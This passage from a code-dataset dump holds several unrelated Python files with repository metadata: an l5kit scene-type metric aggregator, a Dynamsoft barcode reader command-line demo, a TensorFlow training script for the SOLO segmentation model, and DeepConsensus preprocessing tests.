] | 1 | 2021-12-04T17:48:53.000Z | 2021-12-04T17:48:53.000Z | l5kit/l5kit/cle/scene_type_agg.py | cdicle-motional/l5kit | 4dc4ee5391479bb71f0b373f39c316f9eef5a961 | [
"Apache-2.0"
] | null | null | null | l5kit/l5kit/cle/scene_type_agg.py | cdicle-motional/l5kit | 4dc4ee5391479bb71f0b373f39c316f9eef5a961 | [
"Apache-2.0"
] | 1 | 2021-11-19T08:13:46.000Z | 2021-11-19T08:13:46.000Z | from collections import defaultdict
from typing import DefaultDict, Dict, List, Set, Tuple
import torch
from l5kit.cle.metric_set import L5MetricSet
def compute_cle_scene_type_aggregations(mset: L5MetricSet,
scene_ids_to_scene_types: List[List[str]],
list_validator_table_to_publish: List[str]) -> Dict[str, torch.Tensor]:
"""Compute the scene-type metric aggregations.
:param mset: metric set to aggregate by scene type
:param scene_ids_to_scene_types: list of scene type tags per scene
:param list_validator_table_to_publish: list of validators for which we return structured dictionary of results
:return: dict of result key "scene_type/validator_name" to scale tensor aggregation value.
"""
# Set of scene types in the validation set.
valid_scene_types: List[str] = \
list(set([scene_type for scene_types in scene_ids_to_scene_types for scene_type in scene_types]))
# Aggregate validator failures by scene type.
validator_failed_frames = mset.aggregate_failed_frames()
failed_scene_type_results: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for vname, failed_frames in validator_failed_frames.items():
# Aggregate scenes and frames by scene type.
scene_set: DefaultDict[str, Set[int]] = defaultdict(set)
frame_count: DefaultDict[str, int] = defaultdict(int)
for scene_id, _ in failed_frames:
scene_id = scene_id.item()
for scene_type in scene_ids_to_scene_types[scene_id]:
if scene_id not in scene_set[scene_type]:
scene_set[scene_type].add(scene_id)
frame_count[scene_type] += 1
# Add scene aggregations.
for scene_type in scene_set:
scene_type_agg = len(scene_set[scene_type])
failed_scene_type_results[scene_type, vname] = scene_type_agg
# Aggregate pass/fail by scene type.
scene_type_results: Dict[str, torch.Tensor] = {}
for scene_type in valid_scene_types:
for vname in mset.evaluation_plan.validators_dict():
result_key = "/".join([scene_type, vname])
scene_type_results[result_key] = failed_scene_type_results[scene_type, vname]
return scene_type_results
| 45.529412 | 115 | 0.693368 | 314 | 2,322 | 4.828025 | 0.238854 | 0.166227 | 0.063325 | 0.039578 | 0.253958 | 0.149077 | 0.047493 | 0 | 0 | 0 | 0 | 0.002255 | 0.236003 | 2,322 | 50 | 116 | 46.44 | 0.852311 | 0.238587 | 0 | 0 | 0 | 0 | 0.000576 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.137931 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6524285319b0772331948a40c89a779d6c41fdfe | 8,714 | py | Python | demo/BarcodeReaderDemo.py | ZoroWang/python-barcode | a5fb175661dda768c5102ddbb236f0f831d708d3 | [
"OLDAP-2.5"
] | 13 | 2020-05-18T13:13:17.000Z | 2021-09-30T12:33:26.000Z | demo/BarcodeReaderDemo.py | ZoroWang/python-barcode | a5fb175661dda768c5102ddbb236f0f831d708d3 | [
"OLDAP-2.5"
] | 3 | 2020-08-17T02:16:14.000Z | 2021-10-08T00:59:27.000Z | demo/BarcodeReaderDemo.py | ZoroWang/python-barcode | a5fb175661dda768c5102ddbb236f0f831d708d3 | [
"OLDAP-2.5"
] | 10 | 2020-05-11T08:03:58.000Z | 2021-07-17T21:18:29.000Z | # -*-coding:utf-8-*-
import os
import sys
import json
import time
import glob
from dbr import *
reader = BarcodeReader()
Barcode_Format_Dict = {
'1': (EnumBarcodeFormat.BF_ALL, EnumBarcodeFormat_2.BF2_POSTALCODE | EnumBarcodeFormat_2.BF2_DOTCODE),
'2': (EnumBarcodeFormat.BF_ONED, EnumBarcodeFormat_2.BF2_NULL),
'3': (EnumBarcodeFormat.BF_QR_CODE, EnumBarcodeFormat_2.BF2_NULL),
'4': (EnumBarcodeFormat.BF_CODE_39, EnumBarcodeFormat_2.BF2_NULL),
'5': (EnumBarcodeFormat.BF_CODE_128, EnumBarcodeFormat_2.BF2_NULL),
'6': (EnumBarcodeFormat.BF_CODE_93, EnumBarcodeFormat_2.BF2_NULL),
'7': (EnumBarcodeFormat.BF_CODABAR, EnumBarcodeFormat_2.BF2_NULL),
'8': (EnumBarcodeFormat.BF_ITF, EnumBarcodeFormat_2.BF2_NULL),
'9': (EnumBarcodeFormat.BF_INDUSTRIAL_25, EnumBarcodeFormat_2.BF2_NULL),
'10': (EnumBarcodeFormat.BF_EAN_13, EnumBarcodeFormat_2.BF2_NULL),
'11': (EnumBarcodeFormat.BF_EAN_8, EnumBarcodeFormat_2.BF2_NULL),
'12': (EnumBarcodeFormat.BF_UPC_A, EnumBarcodeFormat_2.BF2_NULL),
'13': (EnumBarcodeFormat.BF_UPC_E, EnumBarcodeFormat_2.BF2_NULL),
'14': (EnumBarcodeFormat.BF_PDF417, EnumBarcodeFormat_2.BF2_NULL),
'15': (EnumBarcodeFormat.BF_DATAMATRIX, EnumBarcodeFormat_2.BF2_NULL),
'16': (EnumBarcodeFormat.BF_AZTEC, EnumBarcodeFormat_2.BF2_NULL),
'17': (EnumBarcodeFormat.BF_CODE_39_EXTENDED, EnumBarcodeFormat_2.BF2_NULL),
'18': (EnumBarcodeFormat.BF_MAXICODE, EnumBarcodeFormat_2.BF2_NULL),
'19': (EnumBarcodeFormat.BF_GS1_DATABAR, EnumBarcodeFormat_2.BF2_NULL),
'20': (EnumBarcodeFormat.BF_PATCHCODE, EnumBarcodeFormat_2.BF2_NULL),
'21': (EnumBarcodeFormat.BF_GS1_COMPOSITE, EnumBarcodeFormat_2.BF2_NULL),
'22': (EnumBarcodeFormat.BF_NULL, EnumBarcodeFormat_2.BF2_POSTALCODE),
'23': (EnumBarcodeFormat.BF_NULL, EnumBarcodeFormat_2.BF2_DOTCODE)
}
Template_Settings = {
'1': '{"ImageParameter":{'
'"Name":"BestCoverage",'
'"DeblurLevel":9,'
'"ExpectedBarcodesCount":512,'
'"ScaleDownThreshold":100000,'
'"LocalizationModes":['
'{"Mode":"LM_CONNECTED_BLOCKS"},'
'{"Mode":"LM_SCAN_DIRECTLY"},'
'{"Mode":"LM_STATISTICS"},'
'{"Mode":"LM_LINES"},'
'{"Mode":"LM_STATISTICS_MARKS"}],'
'"GrayscaleTransformationModes":['
'{"Mode":"GTM_ORIGINAL"},'
'{"Mode":"GTM_INVERTED"}]'
'}'
'}',
'2': '{"ImageParameter":{'
'"Name":"BestSpeed",'
'"DeblurLevel":3,'
'"ExpectedBarcodesCount":512,'
'"LocalizationModes":['
'{"Mode":"LM_SCAN_DIRECTLY"}],'
'"TextFilterModes":['
'{"MinImageDimension":262144,"Mode":"TFM_GENERAL_CONTOUR"}]'
'}'
'}',
'3': '{"ImageParameter":{'
'"Name":"Balance",'
'"DeblurLevel":5,'
'"ExpectedBarcodesCount":512,'
'"LocalizationModes":['
'{"Mode":"LM_CONNECTED_BLOCKS"},'
'{"Mode":"LM_STATISTICS"}]'
'}'
'}'
}
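# The templates above are plain JSON strings, so a variant can be derived
# programmatically instead of editing the literals (sketch; the DeblurLevel tweak is
# just an illustration — json is already imported at the top of this script):
# custom = json.loads(Template_Settings['3'])
# custom['ImageParameter']['DeblurLevel'] = 7
# reader.init_runtime_settings_with_string(json.dumps(custom))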
def init_runtime_settings():
while True:
print()
print("Step 2: Choose a template settings : ")
print("\t 1: Best Coverage Settings")
print("\t 2: Best Speed Settings")
print("\t 3: Balance Settings")
item = input()
if str(item) == 'q' or str(item) == 'Q':
print('Bye, looking forward to your next use.')
exit()
if str(item) not in Template_Settings.keys():
print('Please choose a valid number.')
continue
else:
reader.init_runtime_settings_with_string(Template_Settings[item])
break
def set_barcode_format():
while True:
print()
print("Step 3: Choose a number for the format(s) of your barcode image: ")
print("\t 1: All")
print("\t 2: OneD")
print("\t 3: QR Code")
print("\t 4: Code 39")
print("\t 5: Code 128")
print("\t 6: Code 93")
print("\t 7: Codabar")
print("\t 8: Interleaved 2 of 5")
print("\t 9: Industrial 2 of 5")
print("\t 10: EAN-13")
print("\t 11: EAN-8")
print("\t 12: UPC-A")
print("\t 13: UPC-E")
print("\t 14: PDF417")
print("\t 15: DATAMATRIX")
print("\t 16: AZTEC")
print("\t 17: Code 39 Extended")
print("\t 18: Maxicode")
print("\t 19: GS1 Databar")
print("\t 20: PatchCode")
print("\t 21: GS1 Composite")
print("\t 22: Postal Code")
print("\t 23: DotCode")
item = input()
if str(item) == 'q' or str(item) == 'Q':
print('Bye, looking forward to your next use.')
exit()
if str(item) not in Barcode_Format_Dict.keys():
print('Please choose a valid number.')
continue
else:
settings = reader.get_runtime_settings()
settings.barcode_format_ids = Barcode_Format_Dict[item][0]
settings.barcode_format_ids_2 = Barcode_Format_Dict[item][1]
reader.update_runtime_settings(settings)
break
def decode_file(path):
try:
start_time = time.time()
text_results = reader.decode_file(path)
end_time = time.time()
spend_time = (end_time - start_time)*1000
if text_results is not None:
print('Total barcode(s) found : {0}. Total time spent: {1} ms.'.format(len(text_results), spend_time))
i = 1
for text_result in text_results:
print("-------------")
print('Barcode {0}'.format(i))
print("Barcode Format : ")
print(text_result.barcode_format_string)
print("Barcode Text : ")
print(text_result.barcode_text)
print("Barcode Bytes : ")
print(text_result.barcode_bytes)
print("Localization Points : ")
print(text_result.localization_result.localization_points)
print("Exception : ")
print(text_result.exception)
print("-------------")
i = i + 1
else:
print("-------------")
print("No barcode found. Total time spent: {0} ms.".format(spend_time))
print("-------------")
except BarcodeReaderError as bre:
print(bre)
def decode_files(path):
for idx, img in enumerate(glob.glob(os.path.join(path, "*.*"))):
print('Image', idx + 1)
print(img)
print(40 * '#')
decode_file(img)
print(40 * '#')
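# The decode helpers can also be used non-interactively — a sketch, assuming a
# valid license has already been applied to `reader`:
# reader.init_license("your-license-key")
# decode_file("path/to/barcode.png")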
if __name__ == '__main__':
license_key = "Input your own license"
# Apply for a trial license: https://www.dynamsoft.com/customer/license/trialLicense?product=dbr&utm_source=github
reader.init_license(license_key)
## The code snippet below shows how to use the full license in DBR 8.x:
# connection_paras = BarcodeReader.init_lts_connection_parameters()
## If DBR service is already built on your server, you can fill in the address of your server, or leave this property's default value.
# connection_paras.main_server_url = "Input your own server url"
# connection_paras.handshake_code = "Input your own handshake"
# connection_paras.deployment_type = EnumDMDeploymentType.DM_DT_DESKTOP
# connection_paras.uuid_generation_method = EnumDMUUIDGenerationMethod.DM_UUIDGM_RANDOM
# try:
# error = BarcodeReader.init_license_from_lts(connection_paras)
# if error[0] != EnumErrorCode.DBR_OK:
# print(error[1])
# except BarcodeReaderError as bre:
# print(bre)
print("*************************************************")
print("Welcome to Dynamsoft Barcode Reader Demo")
print("*************************************************")
print("Hints: Please input 'Q'or 'q' to quit the application.")
print()
while True:
path = input("Step 1: Input your image path or folder path:")
if path == 'q' or path == 'Q':
print('Bye, looking forward to your next use.')
exit()
if not os.path.exists(path):
print("The picture or folder path doesn't exist , please input a valid path.")
continue
init_runtime_settings()
set_barcode_format()
if os.path.isdir(path):
decode_files(path)
elif os.path.isfile(path):
decode_file(path)
else:
print("The path is invalid , please input a valid path.")
continue
| 37.722944 | 138 | 0.584118 | 968 | 8,714 | 5.054752 | 0.262397 | 0.031882 | 0.103004 | 0.102187 | 0.151441 | 0.123442 | 0.078479 | 0.060495 | 0.060495 | 0.042101 | 0 | 0.034179 | 0.271402 | 8,714 | 230 | 139 | 37.886957 | 0.736494 | 0.099036 | 0 | 0.265957 | 0 | 0 | 0.268352 | 0.08094 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021277 | false | 0 | 0.031915 | 0 | 0.053191 | 0.340426 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6525e20fd56f57771ac5fa7fed4aacac1e11f0bb | 11,933 | py | Python | train.py | quanghona/SOLO_tf2 | 4aab0fc9115d210f08e694ec59b5f093ade8ce91 | [
"MIT"
] | 8 | 2021-03-07T10:25:21.000Z | 2022-02-20T23:57:24.000Z | train.py | quanghona/SOLO_tf2 | 4aab0fc9115d210f08e694ec59b5f093ade8ce91 | [
"MIT"
] | null | null | null | train.py | quanghona/SOLO_tf2 | 4aab0fc9115d210f08e694ec59b5f093ade8ce91 | [
"MIT"
] | null | null | null | from model.model import SOLO
from train.loss import SOLOLoss
from data.tfrecord_decode import Parser
from config import *
import argparse
from datetime import datetime
import time
import os
import tensorflow as tf
from tensorflow.keras.utils import Progbar
tf.config.run_functions_eagerly(False) # for debugging
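# Note: flip the flag above to True to run the @tf.function-decorated steps below
# eagerly (steppable in a debugger), at the cost of losing graph-compilation speed.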
@tf.function
def train_step(model, loss_fn, optimizer, images, cat_true, mask_true, cat_metric, mask_metric):
with tf.GradientTape() as tape:
cat_pred, mask_pred = model(images, training=True)  # use the images parameter, not the global loop variable
total_loss, l_cate, l_mask = loss_fn((cat_true, mask_true), (cat_pred, mask_pred))
gradients = tape.gradient(total_loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
cat_metric.update_state(cat_true, cat_pred)
mask_metric.update_state(mask_true, mask_pred)
return total_loss, l_cate, l_mask
@tf.function
def test_step(model, loss_fn, images, cat_true, mask_true, cat_metric, mask_metric):
cat_pred, mask_pred = model(images, training=False)  # use the images parameter, not the global loop variable
total_loss, l_cate, l_mask = loss_fn((cat_true, mask_true), (cat_pred, mask_pred))  # match the tuple call convention used in train_step
cat_metric.update_state(cat_true, cat_pred)
mask_metric.update_state(mask_true, mask_pred)
return total_loss, l_cate, l_mask
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='SOLO network training script')
parser.add_argument("--dataset_train", type=str,
help="path to training dataset tfrecord BASE path")
parser.add_argument("--dataset_val", type=str,
help="path to validation dataset tfrecord BASE path")
args = parser.parse_args()
print("Training SOLO network")
display_config("train")
# Load model
model = SOLO(**MODEL_HYPERPARAMETERS)
# add weight decay
for layer in model.layers:
if isinstance(layer, tf.keras.layers.Conv2D) or isinstance(layer, tf.keras.layers.Dense):
layer.add_loss(lambda: tf.keras.regularizers.l2(TRAINING_PARAMETERS['weight_decay'])(layer.kernel))
if hasattr(layer, 'bias_regularizer') and layer.use_bias:
layer.add_loss(lambda: tf.keras.regularizers.l2(TRAINING_PARAMETERS['weight_decay'])(layer.bias))
# Training scheme
lr_schedule = tf.keras.optimizers.schedules.PiecewiseConstantDecay(boundaries=tf.math.multiply(TRAINING_PARAMETERS['epochs'], TRAINING_PARAMETERS['steps_per_epoch']),
values=tf.constant(TRAINING_PARAMETERS['learning_rates']))
optimizer = tf.keras.optimizers.SGD(learning_rate=lr_schedule, momentum=TRAINING_PARAMETERS['momentum'])
loss_fn = SOLOLoss()
# Load data
train_parser = Parser(MODEL_HYPERPARAMETERS['input_size'],
MODEL_HYPERPARAMETERS['grid_sizes'][0],
MODEL_HYPERPARAMETERS['num_class'],
mode='train')
val_parser = Parser(MODEL_HYPERPARAMETERS['input_size'],
MODEL_HYPERPARAMETERS['grid_sizes'][0],
MODEL_HYPERPARAMETERS['num_class'],
mode='val')
train_dataset = train_parser.build_dataset(args.dataset_train,
batch_size=TRAINING_PARAMETERS['batch_size'],
num_epoch=TRAINING_PARAMETERS['num_epoch'])
val_dataset = val_parser.build_dataset(args.dataset_val)
"""Training using built-in method
tb_callback = tf.keras.callbacks.TensorBoard(log_dir=os.path.join('logs', model.model_name), update_freq='batch')
ckpt_callback = tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join('weights', model.model_name, 'weight_' + model.model_name + '.h5'),
save_best_only=True,
save_weights_only=True)
model.compile(optimizer=optimizer,
loss=[loss_fn.get_category_loss(), loss_fn.get_mask_loss()],
loss_weights=loss_fn.weights,
metrics=[tf.keras.metrics.CategoricalAccuracy(),
tf.keras.metrics.MeanIoU(num_classes=MODEL_HYPERPARAMETERS['num_class'])])
model.fit(x=train_dataset,
batch_size=TRAINING_PARAMETERS['batch_size'],
epochs=TRAINING_PARAMETERS['num_epoch'],
shuffle=True,
steps_per_epoch=TRAINING_PARAMETERS['steps_per_epoch'],
validation_data=val_dataset,
validation_batch_size=TRAINING_PARAMETERS['batch_size'],
verbose=1,
callbacks=[tb_callback, ckpt_callback])
"""
# Training using low-level API
# Load/create Checkpoint
ckpt = tf.train.Checkpoint(step=tf.Variable(-1, trainable=False, dtype=tf.int64),
optimizer=optimizer,
model=model,
metric=tf.Variable(1000, trainable=False, dtype=tf.float32))
manager = tf.train.CheckpointManager(ckpt, os.path.join('checkpoints', model.model_name), max_to_keep=5)
ckpt.restore(manager.latest_checkpoint)
if manager.latest_checkpoint:
print("Restored from {}".format(manager.latest_checkpoint))
else:
print("Initializing from scratch.")
# Define Losses
train_loss = tf.keras.metrics.Mean(name='train_loss', dtype=tf.float32)
train_cat_loss = tf.keras.metrics.Mean(name='train_cat_loss', dtype=tf.float32)
train_mask_loss = tf.keras.metrics.Mean(name='train_mask_loss', dtype=tf.float32)
val_loss = tf.keras.metrics.Mean(name='val_loss', dtype=tf.float32)
val_cat_loss = tf.keras.metrics.Mean(name='val_cat_loss', dtype=tf.float32)
val_mask_loss = tf.keras.metrics.Mean(name='val_mask_loss', dtype=tf.float32)
# Define metrics
train_acc = tf.keras.metrics.CategoricalAccuracy(name='train_acc', dtype=tf.float32)
train_meaniou = tf.keras.metrics.MeanIoU(num_classes=2, name='train_meaniou', dtype=tf.float32)
val_acc = tf.keras.metrics.CategoricalAccuracy(name='val_acc', dtype=tf.float32)
val_meaniou = tf.keras.metrics.MeanIoU(num_classes=2, name='val_meaniou', dtype=tf.float32)
# Create logger
log_dir = os.path.join('logs', model.model_name, datetime.now().strftime("%Y%m%d%H%M%S"))
summary_writer = tf.summary.create_file_writer(log_dir)
step = ckpt.step.numpy()
val_metric = ckpt.metric.numpy()
total_val_sample = 5000
progbar = None
start_time = time.perf_counter()
# Start training
for image, cat_true, mask_true in train_dataset:
ckpt.step.assign_add(1)
step += 1
# On epoch start
epoch_step = (step % TRAINING_PARAMETERS['steps_per_epoch']) + 1
if epoch_step == 1:
print("Epoch {}/{}".format((step // TRAINING_PARAMETERS['steps_per_epoch']) + 1, TRAINING_PARAMETERS['num_epoch']))
progbar = Progbar(TRAINING_PARAMETERS['steps_per_epoch'], interval=1, stateful_metrics=['train_acc', 'train_meaniou'])
total_loss, l_cate, l_mask = train_step(model,
loss_fn,
optimizer,  # order matches the train_step signature (model, loss_fn, optimizer, ...)
image,
cat_true,
mask_true,
train_acc,
train_meaniou)
values = [('train_loss', total_loss),
('train_cat_loss', l_cate),
('train_mask_loss', l_mask),
('train_acc', train_acc.result()),
('train_meaniou', train_meaniou.result())]
progbar.update(epoch_step, values)
train_loss.update_state(total_loss)
train_cat_loss.update_state(l_cate)
train_mask_loss.update_state(l_mask)
with summary_writer.as_default():
tf.summary.scalar('train loss', train_loss.result(), step=step)
tf.summary.scalar('train category loss', train_cat_loss.result(), step=step)
tf.summary.scalar('train mask loss', train_mask_loss.result(), step=step)
tf.summary.scalar('train accuracy', train_acc.result(), step=step)
tf.summary.scalar('train mean IoU', train_meaniou.result(), step=step)
# On epoch end
if epoch_step == TRAINING_PARAMETERS['steps_per_epoch']:
# Save checkpoint (weights, optimizer states)
save_path = manager.save()
print("Saved checkpoint: {}. Loss: {:1.2f}, acc: {:1.2f}, meanIoU: {:1.2f}".format(save_path, train_loss.result(), train_acc.result(), train_meaniou.result()))
# Validation
print("Start validation...")
val_progbar = Progbar(total_val_sample, interval=1, stateful_metrics=['val_acc', 'val_meaniou'])
val_step = 0
for image, cat_true, mask_true in val_dataset:
val_step += 1
total_loss, l_cate, l_mask = test_step(model,
loss_fn,
image,
cat_true,
mask_true,
val_acc,
val_meaniou)
values = [('val_loss', total_loss),
('val_cat_loss', l_cate),
('val_mask_loss', l_mask),
('val_acc', val_acc.result()),
('val_meaniou', val_meaniou.result())]
val_progbar.update(val_step, values)  # update the validation progress bar, not the training one
val_loss.update_state(total_loss)
val_cat_loss.update_state(l_cate)
val_mask_loss.update_state(l_mask)
with summary_writer.as_default():
tf.summary.scalar('validation loss', val_loss.result(), step=step)
tf.summary.scalar('validation category loss', val_cat_loss.result(), step=step)
tf.summary.scalar('validation mask loss', val_mask_loss.result(), step=step)
tf.summary.scalar('validation accuracy', val_acc.result(), step=step)
tf.summary.scalar('validation mean IoU', val_meaniou.result(), step=step)
# Save new best weight
new_metric = (val_acc.result() + val_meaniou.result()) / 2
if val_metric < new_metric:
val_metric = new_metric
ckpt.metric.assign(new_metric)
weight_path = os.path.join('weights', model.model_name, 'weight_{}_{}_{}_{}_{}_{}_{}_{}.h5'.format(model.model_name, model.num_class, model.input_size, '_'.join([str(i) for i in model.grid_sizes]), model.head_style, model.head_depth, model.fpn_channel, new_metric))
print("Val acc: {}, Val meaniou: {}. Saving weight to {}...".format(val_acc.result(), val_meaniou.result(), weight_path))
model.save_weights(weight_path)
total_val_sample = val_step
# Reset metrics state
train_loss.reset_states()
train_cat_loss.reset_states()
train_mask_loss.reset_states()
val_loss.reset_states()
val_cat_loss.reset_states()
val_mask_loss.reset_states()
train_acc.reset_states()
val_acc.reset_states()
train_meaniou.reset_states()
val_meaniou.reset_states()
train_time = int(time.perf_counter() - start_time)
train_hour = train_time // 3600
train_time = train_time % 3600
train_minute = train_time // 60
train_second = train_time % 60
print("Total training time: {} h {} m {} s".format(train_hour, train_minute, train_second))
| 50.138655 | 281 | 0.611162 | 1,398 | 11,933 | 4.924177 | 0.168813 | 0.020337 | 0.024404 | 0.017432 | 0.418652 | 0.327716 | 0.270482 | 0.195962 | 0.147879 | 0.113887 | 0 | 0.0084 | 0.28174 | 11,933 | 237 | 282 | 50.350211 | 0.794773 | 0.025308 | 0 | 0.129412 | 0 | 0.005882 | 0.109998 | 0.003179 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011765 | false | 0 | 0.058824 | 0 | 0.082353 | 0.047059 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6526e9b541886c0d2f17f42eb68b3176092c3761 | 6,366 | py | Python | deepconsensus/preprocess/preprocess_test.py | pichuan/deepconsensus | f1413ee0802dd09fb5a4507983314935e32ab482 | [
"BSD-3-Clause"
] | 106 | 2021-09-01T02:59:16.000Z | 2022-03-30T17:28:42.000Z | deepconsensus/preprocess/preprocess_test.py | pichuan/deepconsensus | f1413ee0802dd09fb5a4507983314935e32ab482 | [
"BSD-3-Clause"
] | 25 | 2021-09-01T06:49:44.000Z | 2022-03-31T01:45:32.000Z | deepconsensus/preprocess/preprocess_test.py | pichuan/deepconsensus | f1413ee0802dd09fb5a4507983314935e32ab482 | [
"BSD-3-Clause"
] | 16 | 2021-09-01T05:08:24.000Z | 2022-03-31T01:47:04.000Z | # Copyright (c) 2021, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of Google Inc. nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for preprocess."""
import json
import os
from absl import flags
from absl.testing import absltest
from absl.testing import parameterized
import tensorflow as tf
from deepconsensus.preprocess import preprocess
from deepconsensus.preprocess import utils
from deepconsensus.utils.test_utils import deepconsensus_testdata
testdata = deepconsensus_testdata
FLAGS = flags.FLAGS
def load_summary(tmp_dir, path):
summary_path = os.path.join(tmp_dir, path)
return json.load(open(summary_path, 'r'))
def load_dataset(output, dataset):
# Load inference, train, eval, or test tfrecord.gz files.
tf_record = output.replace('@split', dataset)
dataset = tf.data.TFRecordDataset(tf_record, compression_type='GZIP')
examples = list(dataset.as_numpy_iterator())
return examples
def get_unique_zmws(examples):
zmws = []
for example in examples:
features = utils.tf_example_to_features_dict(example)
zmws.append(int(features['name'].split('/')[1]))
return len(set(zmws))
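# Sketch of how the helpers above combine (the path is hypothetical):
# examples = load_dataset('/tmp/tf-@split.tfrecord.gz', 'train')
# assert get_unique_zmws(examples) <= len(examples)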
class PreprocessE2E(parameterized.TestCase):
@parameterized.parameters([0, 2])
def test_e2e_inference(self, n_cpus):
"""Tests preprocessing inference in both single and multiprocess mode."""
n_zmws = 3
FLAGS.subreads_to_ccs = testdata('human_1m/subreads_to_ccs.bam')
FLAGS.ccs_fasta = testdata('human_1m/ccs.fasta')
FLAGS.cpus = n_cpus
FLAGS.limit = n_zmws
tmp_dir = self.create_tempdir()
output = os.path.join(tmp_dir, 'tf-@split.tfrecord.gz')
FLAGS.output = output
preprocess.main([])
examples = load_dataset(output, 'inference')
features = utils.tf_example_to_features_dict(examples[0], inference=True)
# Check that window_pos incr. monotonically for each ZMW.
last_pos = -1
last_zmw = -1
for example in examples:
features = utils.tf_example_to_features_dict(example, inference=True)
zmw = int(features['name'].split('/')[1])
if zmw != last_zmw:
last_zmw = zmw
last_pos = -1
window_pos = int(features['window_pos'])
self.assertGreater(window_pos, last_pos)
last_zmw = zmw
last_pos = window_pos
summary = load_summary(tmp_dir, 'tf-summary.inference.json')
self.assertEqual(summary['n_zmw_pass'], n_zmws)
self.assertLen(examples, summary['n_examples'])
@parameterized.parameters([0, 2])
def test_e2e_train(self, n_cpus):
"""Tests preprocessing training in both single and multiprocess mode."""
n_zmws = 10
FLAGS.subreads_to_ccs = testdata('human_1m/subreads_to_ccs.bam')
FLAGS.ccs_fasta = testdata('human_1m/ccs.fasta')
FLAGS.truth_to_ccs = testdata('human_1m/truth_to_ccs.bam')
FLAGS.truth_bed = testdata('human_1m/truth.bed')
FLAGS.truth_split = testdata('human_1m/truth_split.tsv')
FLAGS.cpus = n_cpus
FLAGS.limit = n_zmws
tmp_dir = self.create_tempdir()
output = os.path.join(tmp_dir, 'tf-@split.tfrecord.gz')
FLAGS.output = output
preprocess.main([])
train_examples = load_dataset(output, 'train')
eval_examples = load_dataset(output, 'eval')
test_examples = load_dataset(output, 'test')
all_examples = train_examples + eval_examples + test_examples
# Check that window_pos incr. monotonically for each ZMW.
last_pos = -1
last_zmw = -1
for example in all_examples:
features = utils.tf_example_to_features_dict(example, inference=False)
zmw = int(features['name'].split('/')[1])
if zmw != last_zmw:
last_zmw = zmw
last_pos = -1
window_pos = int(features['window_pos'])
self.assertGreater(window_pos, last_pos)
last_zmw = zmw
last_pos = window_pos
summary = load_summary(tmp_dir, 'tf-summary.training.json')
# Total count
self.assertLen(all_examples, summary['n_examples'])
# Test ZMW counts match
n_zmw_train = get_unique_zmws(train_examples)
n_zmw_eval = get_unique_zmws(eval_examples)
n_zmw_test = get_unique_zmws(test_examples)
self.assertLessEqual(summary['n_zmw_pass'], n_zmws)
self.assertEqual(n_zmw_train + n_zmw_eval + n_zmw_test,
summary['n_zmw_pass'])
self.assertEqual(n_zmw_train, summary['n_zmw_train'])
self.assertEqual(n_zmw_eval, summary['n_zmw_eval'])
self.assertEqual(n_zmw_test, summary['n_zmw_test'])
# Test n example counts match
self.assertLen(train_examples, summary['n_examples_train'])
self.assertLen(eval_examples, summary['n_examples_eval'])
self.assertLen(test_examples, summary['n_examples_test'])
features = utils.tf_example_to_features_dict(train_examples[0])
self.assertIn('label', features)
self.assertIn('label/shape', features)
self.assertTrue(
(features['subreads'].shape == features['subreads/shape']).all())
if __name__ == '__main__':
absltest.main()
